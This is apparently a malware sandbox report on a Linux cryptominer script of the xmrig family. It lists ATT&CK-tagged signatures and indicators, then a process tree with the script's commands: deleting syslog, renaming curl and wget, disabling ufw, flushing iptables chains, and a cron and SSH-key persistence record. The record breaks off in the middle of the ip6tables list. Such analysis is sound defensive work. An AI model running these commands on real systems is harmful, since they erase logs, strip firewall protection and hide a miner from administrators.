xmrig_linux | 196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910

Analysis

max time kernel
148s
max time network
149s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
23-01-2025 06:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Size

37KB
MD5

d6648f420423f9dad4292a606f743c4b
SHA1

dcae47ec15e96274a39fcce4352077846ebf7b70
SHA256

196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910
SHA512

3820b4fb435732fef05157ff0713ed3a62269dc1c21240dbf7e2e59191a0f34050247573b4d9758cd84495fb28d8f346e381b8f09a9041c70ca88333b1303f93
SSDEEP

384:Q7pQQwQHDf6lpTWg3vM4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdUeUoJpJydIi:Q7xFNB48Fkc2zq0xvMGdl18r

Score

10^/10

xmrig_linux defense_evasion discovery execution miner persistence privilege_escalation rootkit

Malware Config

Signatures

Xmrig_linux family
xmrig_linux
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

Adds new SSH keys 1 TTPs 1 IoCs

Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.

persistence privilege_escalation

SSH Authorized Keys

T1098.004

description	ioc	Process
File opened for modification	/root/.ssh/authorized_keys	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
3461	Process not Found
3464	Process not Found
3467	Process not Found

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

defense_evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 1 TTPs 3 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
1707	iptables
3021	Process not Found
1535	ufw

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

ioc	pid	Process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1539	modprobe

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
2311	xargs
2913	Process not Found
1617	iptables
2287	xargs
2870	Process not Found
1794	xargs
2299	xargs
1893	xargs
1923	xargs
2165	xargs
2249	xargs
2407	xargs
2571	Process not Found
1667	ip6tables
1853	xargs
2861	Process not Found
2869	Process not Found
1806	xargs
1963	xargs
2412	xargs
2417	xargs
3102	Process not Found
1557	iptables
1665	ip6tables
2505	xargs
2525	xargs
2611	Process not Found
2873	Process not Found
1638	ip6tables
1664	ip6tables
2853	Process not Found
2941	Process not Found
3101	Process not Found
3103	Process not Found
1634	ip6tables
1938	xargs
3472	Process not Found
2509	xargs
2559	Process not Found
2597	Process not Found
2854	Process not Found
1553	iptables
1632	ip6tables
2511	xargs
2866	Process not Found
3457	Process not Found
1968	xargs
2269	xargs
2841	Process not Found
2846	Process not Found
2052	xargs
2328	xargs
1898	xargs
2068	xargs
2507	xargs
2523	xargs
2527	xargs
2577	Process not Found
1776	xargs
1868	xargs
2975	Process not Found
2885	Process not Found
2893	Process not Found
1701	ip6tables

Creates/modifies Cron job 1 TTPs 2 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/etc/cron.d/zzh	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/etc/crontab	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh

Disables AppArmor 47 IoCs

Disables AppArmor security module.

pid	Process
2958	Process not Found
2958	Process not Found
2999	Process not Found
2999	Process not Found
3022	Process not Found
2999	Process not Found
3022	Process not Found
3072	Process not Found
3076	Process not Found
2958	Process not Found
3022	Process not Found
3071	Process not Found
3073	Process not Found
3079	Process not Found
3080	Process not Found
3082	Process not Found
3063	Process not Found
2958	Process not Found
2995	Process not Found
2999	Process not Found
2999	Process not Found
3022	Process not Found
3022	Process not Found
3087	Process not Found
3063	Process not Found
3070	Process not Found
3074	Process not Found
3078	Process not Found
3083	Process not Found
3084	Process not Found
3086	Process not Found
3088	Process not Found
3063	Process not Found
3063	Process not Found
3063	Process not Found
2958	Process not Found
2999	Process not Found
3022	Process not Found
3066	Process not Found
3068	Process not Found
3075	Process not Found
3081	Process not Found
3085	Process not Found
3089	Process not Found
2958	Process not Found
3077	Process not Found
3063	Process not Found

Enumerates running processes
Discovers information about currently running processes on the system

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com
3	ip-api.com

Writes file to system bin folder 6 IoCs

description	ioc	Process
File opened for modification	/bin/pstree	Process not Found
File opened for modification	/bin/ps	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/bin/ps	Process not Found
File opened for modification	/bin/top	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/bin/top	Process not Found
File opened for modification	/bin/pstree	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	2996	Process not Found

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

pid	Process
2014	ps
2166	ps
2335	ps
1713	ps
1979	ps
2121	ps
2209	ps
2215	ps
2353	ps
1904	ps
2019	ps
2161	ps
2255	ps
2383	ps
1999	ps
1715	ps
1874	ps
1929	ps
2230	ps
1954	ps
2053	ps
2176	ps
2312	ps
2029	ps
2033	ps
2288	ps
1823	ps
1964	ps
2074	ps
1899	ps
2004	ps
2084	ps
2403	ps
1838	ps
1894	ps
1969	ps
1994	ps
1813	ps
1879	ps
2192	ps
1854	ps
2136	ps
2151	ps
2203	ps
2063	ps
2341	ps
2408	ps
1828	ps
1864	ps
1924	ps
2048	ps
2260	ps
2276	ps
1939	ps
1949	ps
1989	ps
2347	ps
1944	ps
2270	ps
2365	ps
1833	ps
2058	ps
2091	ps
2106	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1077/cmdline	Process not Found
File opened for reading	/proc/1176/cmdline	ps
File opened for reading	/proc/1057/status	ps
File opened for reading	/proc/23/cmdline	pgrep
File opened for reading	/proc/1340/cmdline	Process not Found
File opened for reading	/proc/1192/status	Process not Found
File opened for reading	/proc/173/status	Process not Found
File opened for reading	/proc/29/status	ps
File opened for reading	/proc/427/status	ps
File opened for reading	/proc/26/status	ps
File opened for reading	/proc/23/status	Process not Found
File opened for reading	/proc/494/cmdline	Process not Found
File opened for reading	/proc/84/status	ps
File opened for reading	/proc/1094/status	ps
File opened for reading	/proc/538/cmdline	Process not Found
File opened for reading	/proc/1292/cmdline	Process not Found
File opened for reading	/proc/163/stat	ps
File opened for reading	/proc/564/cmdline	ps
File opened for reading	/proc/4/cmdline	ps
File opened for reading	/proc/169/stat	ps
File opened for reading	/proc/30/cmdline	Process not Found
File opened for reading	/proc/1204/stat	ps
File opened for reading	/proc/1514/stat	ps
File opened for reading	/proc/427/cmdline	Process not Found
File opened for reading	/proc/28/stat	ps
File opened for reading	/proc/11/cmdline	ps
File opened for reading	/proc/22/cmdline	ps
File opened for reading	/proc/1134/cmdline	ps
File opened for reading	/proc/166/stat	ps
File opened for reading	/proc/1201/cmdline	Process not Found
File opened for reading	/proc/691/status	ps
File opened for reading	/proc/426/cmdline	Process not Found
File opened for reading	/proc/170/status	ps
File opened for reading	/proc/166/cmdline	ps
File opened for reading	/proc/203/cmdline	Process not Found
File opened for reading	/proc/7/stat	ps
File opened for reading	/proc/30/stat	ps
File opened for reading	/proc/1085/stat	ps
File opened for reading	/proc/204/cmdline	ps
File opened for reading	/proc/1904/stat	ps
File opened for reading	/proc/25/stat	ps
File opened for reading	/proc/178/status	Process not Found
File opened for reading	/proc/1269/cmdline	Process not Found
File opened for reading	/proc/160/status	Process not Found
File opened for reading	/proc/649/cmdline	ps
File opened for reading	/proc/178/cmdline	Process not Found
File opened for reading	/proc/163/cmdline	Process not Found
File opened for reading	/proc/1340/stat	Process not Found
File opened for reading	/proc/1117/cmdline	ps
File opened for reading	/proc/2332/cmdline	ps
File opened for reading	/proc/31/status	Process not Found
File opened for reading	/proc/510/status	Process not Found
File opened for reading	/proc/1155/status	ps
File opened for reading	/proc/203/stat	ps
File opened for reading	/proc/164/cmdline	ps
File opened for reading	/proc/79/cmdline	ps
File opened for reading	/proc/168/cmdline	pgrep
File opened for reading	/proc/510/cmdline	pgrep
File opened for reading	/proc/13/cmdline	ps
File opened for reading	/proc/160/status	Process not Found
File opened for reading	/proc/965/cmdline	ps
File opened for reading	/proc/1269/status	ps
File opened for reading	/proc/1156/status	pgrep
File opened for reading	/proc/1146/cmdline	Process not Found

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1539	modprobe
1996	grep
2026	grep
2242	grep
2752	Process not Found

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/dev/null	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/kdevtmpfsi	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/redis2	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/newsvc.sh	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/svcupdate	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/svcguard	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/svcworkmanager	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/svcupdates	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh

/tmp/196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
/tmp/196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
1⤵
- Adds new SSH keys
- Creates/modifies Cron job
- Writes file to system bin folder
- Writes file to tmp directory
PID:1516
- /bin/grep
  grep -i CN
  2⤵
  PID:1519
- /bin/sed
  sed "s/,/\\n/g"
  2⤵
  PID:1518
- /usr/bin/curl
  curl http://ip-api.com/json/
  2⤵
  PID:1517
- /bin/sync
  sync
  2⤵
  PID:1525
- /bin/cat
  cat /var/spool/cron/
  2⤵
  PID:1526
- /bin/cat
  cat /root/.ssh/authorized_keys
  2⤵
  PID:1527
- /bin/mv
  mv /usr/bin/curl /usr/bin/url
  2⤵
  PID:1528
- /bin/mv
  mv /usr/bin/url /usr/bin/cd1
  2⤵
  PID:1529
- /bin/mv
  mv /usr/bin/wget /usr/bin/get
  2⤵
  PID:1530
- /bin/mv
  mv /usr/bin/get /usr/bin/wd1
  2⤵
  PID:1531
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:1532
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:1533
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:1534
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1535
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:1536
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1537
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1538
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        System Network Configuration Discovery
        
        PID:1539
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1543
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1546
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1547
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1548
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1549
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1550
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:1551
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1552
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:1553
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:1554
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1555
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:1556
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:1557
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1558
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1559
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1560
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1561
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1562
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1563
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1564
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1565
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1566
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1567
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:1568
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1569
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1570
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1571
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1572
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1573
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1574
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1575
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1576
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1577
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1578
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1579
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1580
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1581
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1582
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1583
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1584
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:1585
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:1586
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1587
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:1588
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1589
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1590
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1591
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1592
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1593
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1594
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1595
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1596
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1597
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1598
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1599
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1600
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1601
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1602
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1603
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1604
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1605
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1606
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1607
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1608
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1609
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1610
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1611
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1612
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1613
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1614
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1615
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1616
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      Attempts to change immutable files
      PID:1617
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1618
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1619
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:1620
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1621
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1622
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1623
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1624
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1625
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1626
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1627
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1628
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1629
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1630
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1631
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1632
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1633
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:1634
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1635
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1636
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1637
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:1638
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1639
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1640
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1641
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1642
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1643
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1644
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1645
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1646
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1647
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1648
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:1649
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1650
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1651
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1652
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1653
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1654
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1655
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1656
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1657
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1658
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1659
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1660
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:1661
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1662
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1663
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1664
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      Attempts to change immutable files
      PID:1665
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:1666
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      Attempts to change immutable files
      PID:1667
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:1668
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      PID:1669
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1670
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1671
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1672
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1673
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1674
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1675
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1676
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1677
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1678
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1679
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1680
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:1681
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1682
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1683
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1684
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1685
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1686
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1687
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1688
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1689
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1690
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1691
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1692
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1693
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1694
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1695
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1696
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1697
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
